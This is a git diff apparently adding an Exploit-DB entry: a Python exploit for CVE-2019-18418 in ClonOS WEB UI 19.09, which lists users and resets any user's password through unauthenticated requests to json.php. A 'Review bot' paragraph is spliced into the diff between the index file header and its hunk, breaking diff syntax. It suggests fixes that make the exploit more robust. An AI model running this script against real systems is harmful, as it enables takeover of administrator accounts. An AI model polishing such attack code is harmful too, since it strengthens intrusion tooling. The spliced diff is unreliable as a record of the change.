diff --git a/exploits/php/webapps/47544.py b/exploits/php/webapps/47544.py
new file mode 100755
index 000000000..cfe619513
--- /dev/null
+++ b/exploits/php/webapps/47544.py
@@ -0,0 +1,44 @@
+# Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control
+# Date: 2019-10-19
+# Exploit Author: İbrahim Hakan Şeker
+# Vendor Homepage: https://clonos.tekroutine.com/
+# Software Link: https://github.com/clonos/control-pane
+# Version: 19.09
+# Tested on: ClonOs
+# CVE : 2019-18418
+
+
+import requests
+from bs4 import BeautifulSoup
+import sys
+
+def getUser(host):
+ reg=r'\"'
+ r1 = requests.post(host+"/json.php",data={"mode":"getJsonPage","path":"/users/","hash":"","db_path":""},headers={"X-Requested-With":"XMLHttpRequest"})
+ r1_source = BeautifulSoup(r1.content,"lxml")
+ for k in r1_source.findAll("tr"):
+ for i in k.findAll("td")[0]:
+ print(f"[+]User Found: {i} User id: {k.get('id').replace(reg,'')}")
+def changePassword(host,user,password,id):
+ data={
+ "mode":"usersEdit",
+ "path":"/users/",
+ "hash":"",
+ "db_path":"",
+ "form_data[username]":f"{user}",
+ "form_data[password]":f"{password}",
+ "form_data[password1]":f"{password}",
+ "form_data[first_name]":"",
+ "form_data[last_name]":"",
+ "form_data[actuser]":"on",
+ "form_data[user_id]": int(id)
+ }
+ r2=requests.post(host,data=data,headers={"X-Requested-With":"XMLHttpRequest"})
+ if r2.status_code==200:print("[+]OK")
+ else:print("[-]Fail")
+if __name__=="__main__":
+ if len(sys.argv)>1:
+ if "getUser" in sys.argv[1]:getUser(sys.argv[2])
+ elif "changePassword" in sys.argv[1]:changePassword(sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
+ else:print("Fail parameter")
+ else:print("Usage: exploit.py getUser [http://ip_adres]\nexploit.py changePassword [http://ip_adres] [username] [new_password] [user_id]")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c9d266d08..c1b433848 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
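Review bot: In getUser, `k.get('id').replace(reg,'')` raises AttributeError as soon as a `<tr>` carries no `id` attribute (a header row, for instance), because `Tag.get` returns None; a guard such as `row_id = (k.get('id') or '').replace(reg, '')` keeps the loop going and reports rows without an id instead of aborting the whole listing. The name `reg` suggests a regular expression, but it is only ever passed to `str.replace`, which treats `\"` as a literal two-character string, so a name like `quote_chars` would describe what it actually does. In changePassword the parameter `id` shadows the builtin and `int(id)` fails with a bare ValueError on non-numeric input; renaming it `user_id` and validating it before building the request would make that failure mode explicit. The file also depends on `requests`, `bs4` and, through the `"lxml"` parser argument, lxml without saying so anywhere; a header comment such as `# Requires: requests, beautifulsoup4, lxml` would document the environment the script expects.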
@@ -41862,3 +41862,4 @@ id,file,description,date,author,type,platform,port
 47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
 47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
 47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,
+47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,